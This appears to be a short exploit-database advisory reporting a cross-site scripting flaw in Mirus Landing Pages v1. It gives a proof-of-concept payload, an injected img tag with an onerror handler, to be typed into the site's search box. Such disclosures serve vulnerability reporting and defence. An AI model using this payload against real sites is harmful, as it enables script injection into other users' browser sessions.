Mirus Landing Page version 1 suffers from a cross site scripting vulnerability.
d0ac409673f63ce02355b56ca92a83530a916b6915dd084e93afc95c262319b9
# Exploit Title: Mirus Landing Pages V1 XSS Vulnerability
# Google Dork:N/A
# Date: 2020-04-03
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://mirus.co.il/
# Version: Landing Pages v1
# Tested on: Ubuntu
---------------------------------------------------------
PoC 1 :
XSS Vulnerability
Payload(s) :
In Search box use payload:
"><img src=x onerror=prompt(document.domain);>